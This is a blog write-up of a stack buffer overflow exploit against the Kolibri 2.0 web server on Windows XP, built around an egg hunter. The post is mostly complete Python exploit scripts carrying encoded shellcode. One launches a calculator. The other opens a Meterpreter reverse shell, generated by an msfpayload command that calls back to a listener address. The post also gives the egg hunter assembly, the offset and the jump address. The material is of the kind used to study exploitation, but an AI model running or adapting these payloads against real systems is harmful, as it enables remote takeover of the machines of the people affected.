Egg Hunting Fun

In this vacation I thought of learning to use egg hunters in exploit development. This is just a small write up just after successful exploitation of my meterpreter reverse_tcp shellcode. This is the original exploit which was published in 2010 http://www.exploit-db.com/exploits/15834/. I wanted to implement a egg hunter code to search our shellcode with our tag throughout the heap, stack, etc. Egg hunters are used when we have a limited buffer space.

Download the vulnerable Kalbri server: http://www.exploit-db.com/wp-content/themes/exploit/applications/4d4e15b98e105facf94e4fd6a1f9eb78-Kolibri-2.0-win.zip

I assume you have a good knowledge on developing stack based buffer overflow exploits, about registers, little-endianness,etc which is the very basics.

I developed this exploit under Windows XP SP2 using the USER32.dll which is a operating system dll to find a jump to esp (JMP ESP) command. This application doesn’t use any dlls so this is a platform dependent exploit.

As I mentioned earlier this is very brief  write up.  The offset is at 515 bytes . Our plan is to overwrite the EIP register with our JMP ESP address and we want jump back 60 bytes backwards to the starting point of our hunter so that it would be executed. Then it would search everywhere inside the memory to find the tag and execute our shellcode. Opcode for jmp is EB and 60 bytes back means -60 is C4 so the shellcode would be \xeb\xc4.

I will be using an Egg hunter using NtDisplayString. The size of our Egg hunter is of 32 bytes and of course the egg size is 8 bytes.

[code language=”python”]
6681CAFF0F or dx,0x0fff
42 inc edx
52 push edx
6A43 push byte +0x43
58 pop eax
CD2E int 0x2e
3C05 cmp al,0x5
5A pop edx
74EF jz 0x0
B86f736361 mov eax,0x6f736361; Our tag osca
8BFA mov edi,edx
AF scasd
75EA jnz 0x5
AF scasd
75E7 jnz 0x5
FFE7 jmp edi
[/code]

So the shellcode for the above egg hunter would be:

[code source=”python”]
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8" + "osca" + "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
[/code]

This is my proof of concept calculator exploit code.

[code language=”python”]
#!/usr/bin/python

import socket
import os
import sys
egghunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x6f\x73" #os
"\x63\x61\x8b\xfa" #ca
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")

#Our Tag of the egghunter is oscar which is "\x6f\x73\x63\x61" in hex

shellcode=(
"\x89\xe6\xda\xc9\xd9\x76\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b"
"\x4c\x48\x68\x6d\x59\x55\x50\x33\x30\x37\x70\x43\x50\x4c\x49"
"\x38\x65\x46\x51\x6a\x72\x33\x54\x6c\x4b\x51\x42\x74\x70\x6e"
"\x6b\x51\x42\x36\x6c\x6e\x6b\x53\x62\x67\x64\x4e\x6b\x43\x42"
"\x54\x68\x46\x6f\x78\x37\x70\x4a\x34\x66\x34\x71\x6b\x4f\x35"
"\x61\x4b\x70\x6c\x6c\x67\x4c\x73\x51\x63\x4c\x74\x42\x34\x6c"
"\x75\x70\x39\x51\x78\x4f\x56\x6d\x43\x31\x48\x47\x58\x62\x58"
"\x70\x32\x72\x32\x77\x6c\x4b\x50\x52\x52\x30\x6e\x6b\x30\x42"
"\x57\x4c\x46\x61\x58\x50\x4e\x6b\x33\x70\x30\x78\x6d\x55\x59"
"\x50\x30\x74\x32\x6a\x35\x51\x6e\x30\x76\x30\x6e\x6b\x63\x78"
"\x56\x78\x4c\x4b\x63\x68\x75\x70\x56\x61\x59\x43\x78\x63\x55"
"\x6c\x72\x69\x6c\x4b\x74\x74\x4e\x6b\x73\x31\x6a\x76\x54\x71"
"\x49\x6f\x46\x51\x39\x50\x6c\x6c\x59\x51\x6a\x6f\x76\x6d\x47"
"\x71\x7a\x67\x70\x38\x59\x70\x34\x35\x79\x64\x54\x43\x31\x6d"
"\x58\x78\x75\x6b\x31\x6d\x37\x54\x51\x65\x6d\x32\x43\x68\x4c"
"\x4b\x72\x78\x44\x64\x65\x51\x39\x43\x43\x56\x6e\x6b\x64\x4c"
"\x32\x6b\x6c\x4b\x56\x38\x57\x6c\x47\x71\x58\x53\x4c\x4b\x56"
"\x64\x6c\x4b\x37\x71\x78\x50\x4e\x69\x33\x74\x76\x44\x37\x54"
"\x31\x4b\x61\x4b\x43\x51\x31\x49\x70\x5a\x56\x31\x6b\x4f\x39"
"\x70\x71\x48\x71\x4f\x62\x7a\x4e\x6b\x62\x32\x7a\x4b\x4b\x36"
"\x33\x6d\x61\x7a\x35\x51\x4c\x4d\x6e\x65\x38\x39\x47\x70\x37"
"\x70\x33\x30\x46\x30\x33\x58\x76\x51\x4c\x4b\x62\x4f\x6c\x47"
"\x79\x6f\x58\x55\x4d\x6b\x68\x70\x6e\x55\x79\x32\x66\x36\x71"
"\x78\x39\x36\x5a\x35\x4f\x4d\x6f\x6d\x39\x6f\x38\x55\x65\x6c"
"\x63\x36\x33\x4c\x66\x6a\x4d\x50\x49\x6b\x49\x70\x34\x35\x64"
"\x45\x4d\x6b\x47\x37\x47\x63\x73\x42\x62\x4f\x30\x6a\x73\x30"
"\x72\x73\x79\x6f\x79\x45\x43\x53\x53\x51\x52\x4c\x32\x43\x76"
"\x4e\x35\x35\x31\x68\x72\x45\x75\x50\x41\x41")

junk = "A"*478
esp = "\x01\xaa\xd5\x77" #0x77 d5 aa 01 – USER32.dll
extra = "A"*5
jmp = "\xEB\xc4"

exploit = junk + egghunter + extra + esp + jmp
payload = "oscaosca" + shellcode

buffer = (
"HEAD /" + exploit + " HTTP/1.1\r\n"
"Host: 192.168.111.128:8080\r\n"
"User-Agent: " + payload + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8080)) #If you want to exploit this locally use the localhost of not you can exploit this remotely with the external ip and port 8080 🙂
s.send(buffer)
s.close()
[/code]

vlcsnap-2013-10-29-19h59m52s199

As you see above we were able to do remote code execution using our egg hunter 🙂

Okay time to get a reverse shell and own the system 😉 I will be using a Meterpreter reverse_tcp shellcode as it is kind of fast and has more options to deal with Metasploit instead of a traditional connect back shell.

[code language=”cpp”]msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.100 lport=4444 R | msfencode -e x86/alpha_mixed -t c[/code]

This is our final exploit with our reverse shell.

[code language=”python”]

#!/usr/bin/python

import socket
import os
import sys

print """
\t—————————————–
\t\033[39m+ Kolibri Web Server Egg Hunter Exploit +
\t\033[37m+ Exploit Developed for Windows XP SP2 +
\t\033[31m+ JMP ESP from USER32.dll +
\t\033[37m+ Exploit Developed by Osanda Malith +
\t——————————————
"""
egghunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x6f\x73" #os
"\x63\x61\x8b\xfa" #ca
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")

#Our Tag of the egghunter is oscar which is "\x6f\x73\x63\x61" in hex

shellcode=(
"\x89\xe0\xd9\xe8\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x6b\x4c\x4b\x58\x4c\x49\x35\x50\x65\x50\x65\x50\x33\x50\x4c"
"\x49\x38\x65\x64\x71\x6a\x72\x51\x74\x4e\x6b\x61\x42\x64\x70"
"\x4e\x6b\x56\x32\x36\x6c\x6c\x4b\x76\x32\x55\x44\x4c\x4b\x72"
"\x52\x55\x78\x46\x6f\x4d\x67\x33\x7a\x34\x66\x54\x71\x4b\x4f"
"\x30\x31\x69\x50\x4c\x6c\x45\x6c\x30\x61\x31\x6c\x45\x52\x56"
"\x4c\x47\x50\x6b\x71\x38\x4f\x66\x6d\x63\x31\x79\x57\x58\x62"
"\x6c\x30\x71\x42\x31\x47\x4e\x6b\x36\x32\x36\x70\x4e\x6b\x30"
"\x42\x57\x4c\x57\x71\x78\x50\x6c\x4b\x77\x30\x74\x38\x4e\x65"
"\x6b\x70\x34\x34\x31\x5a\x66\x61\x48\x50\x36\x30\x6c\x4b\x73"
"\x78\x34\x58\x4c\x4b\x61\x48\x71\x30\x65\x51\x6e\x33\x78\x63"
"\x75\x6c\x30\x49\x6c\x4b\x74\x74\x6e\x6b\x37\x71\x59\x46\x46"
"\x51\x49\x6f\x35\x61\x6f\x30\x4c\x6c\x6a\x61\x5a\x6f\x44\x4d"
"\x73\x31\x6a\x67\x36\x58\x6d\x30\x73\x45\x59\x64\x35\x53\x61"
"\x6d\x4c\x38\x55\x6b\x73\x4d\x57\x54\x62\x55\x5a\x42\x46\x38"
"\x4c\x4b\x51\x48\x37\x54\x73\x31\x59\x43\x71\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x72\x78\x45\x4c\x76\x61\x78\x53\x4c\x4b"
"\x33\x34\x6e\x6b\x67\x71\x4e\x30\x4e\x69\x43\x74\x51\x34\x57"
"\x54\x43\x6b\x33\x6b\x53\x51\x72\x79\x53\x6a\x33\x61\x6b\x4f"
"\x49\x70\x70\x58\x43\x6f\x53\x6a\x6e\x6b\x54\x52\x68\x6b\x4f"
"\x76\x73\x6d\x43\x58\x37\x43\x34\x72\x65\x50\x77\x70\x52\x48"
"\x74\x37\x54\x33\x74\x72\x31\x4f\x51\x44\x70\x68\x32\x6c\x64"
"\x37\x34\x66\x46\x67\x6b\x4f\x48\x55\x6c\x78\x4e\x70\x47\x71"
"\x77\x70\x73\x30\x74\x69\x7a\x64\x36\x34\x52\x70\x53\x58\x35"
"\x79\x6f\x70\x50\x6b\x57\x70\x79\x6f\x78\x55\x72\x70\x46\x30"
"\x46\x30\x42\x70\x73\x70\x62\x70\x63\x70\x66\x30\x51\x78\x68"
"\x6a\x76\x6f\x59\x4f\x39\x70\x39\x6f\x38\x55\x4a\x37\x32\x4a"
"\x46\x65\x71\x78\x59\x50\x79\x38\x37\x71\x52\x44\x42\x48\x33"
"\x32\x37\x70\x52\x31\x51\x4c\x4e\x69\x5a\x46\x30\x6a\x54\x50"
"\x46\x36\x73\x67\x31\x78\x4f\x69\x49\x35\x43\x44\x65\x31\x69"
"\x6f\x4e\x35\x4e\x65\x4f\x30\x51\x64\x64\x4c\x39\x6f\x72\x6e"
"\x75\x58\x63\x45\x7a\x4c\x63\x58\x6a\x50\x6f\x45\x69\x32\x72"
"\x76\x6b\x4f\x38\x55\x50\x6a\x77\x70\x73\x5a\x33\x34\x30\x56"
"\x62\x77\x73\x58\x44\x42\x6e\x39\x59\x58\x53\x6f\x6b\x4f\x6e"
"\x35\x6c\x4b\x47\x46\x51\x7a\x33\x70\x71\x78\x53\x30\x64\x50"
"\x43\x30\x67\x70\x42\x76\x70\x6a\x47\x70\x35\x38\x61\x48\x6f"
"\x54\x63\x63\x4a\x45\x59\x6f\x5a\x75\x4a\x33\x71\x43\x62\x4a"
"\x45\x50\x52\x76\x70\x53\x46\x37\x33\x58\x75\x52\x5a\x79\x6a"
"\x68\x61\x4f\x69\x6f\x7a\x75\x35\x51\x78\x43\x37\x59\x49\x56"
"\x4e\x65\x4a\x56\x74\x35\x6a\x4c\x69\x53\x41\x41")

junk = "A"*478
esp = "\x01\xaa\xd5\x77" #0x77 d5 aa 01 – USER32.dll
extra = "A"*5
jmp = "\xEB\xc4"
#"\xcc" +"\xEB\xc4"

exploit = junk + egghunter + extra + esp + jmp
payload = "oscaosca" + shellcode

buffer = (
"HEAD /" + exploit + " HTTP/1.1\r\n"
"Host: 172.16.71.135:8080\r\n"
"User-Agent: " + payload + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((‘172.16.71.135’, 8080)) #If you want to exploit this locally use the localhost of not you can exploit this remotely with the external ip and port 8080 🙂
print ‘[+] Sending Evil Payload’
s.send(buffer)
s.close
print ‘\033[33m[+] Successfuly Exploited the Buffer Overflow’

except:
print "[-] Can’t send evil buffer"
sys.exit(0)

[/code]

vlcsnap-2013-10-29-20h00m19s229

That’s it we are in 🙂 here is the output of the cool screenshot command by our Meterpreter shell of our Win XP machine.

JxJopPRA

Egg hunting is fun isn’t it? It took me about an hour figuring out this theory and developing this exploit from the scratch. You could also give it a try by reading my example code. But I am sorry that I haven’t explained anything from the beginning because this is just small write up for the people who are in this field. I will sure start to write detailed articles on exploit developing if I get some more free time. Actually exploit developing need lots of patience 😉

I made a quick video to celebrate my happiness after getting a nice little shell ^_^

[youtube=http://www.youtube.com/watch?v=XiTr2qsiZL8&feature=youtu.be]

Here is a good research paper by skape about egg hunting: http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf

As always respect Peter Van Eeckhoutte (corelanc0d3r) for his tutorials and exploits.

8 thoughts on “Egg Hunting Fun

    • Thanks ! Sure I’ll post more in my leisure time 🙂
      Thanks for the comment!

Leave a Reply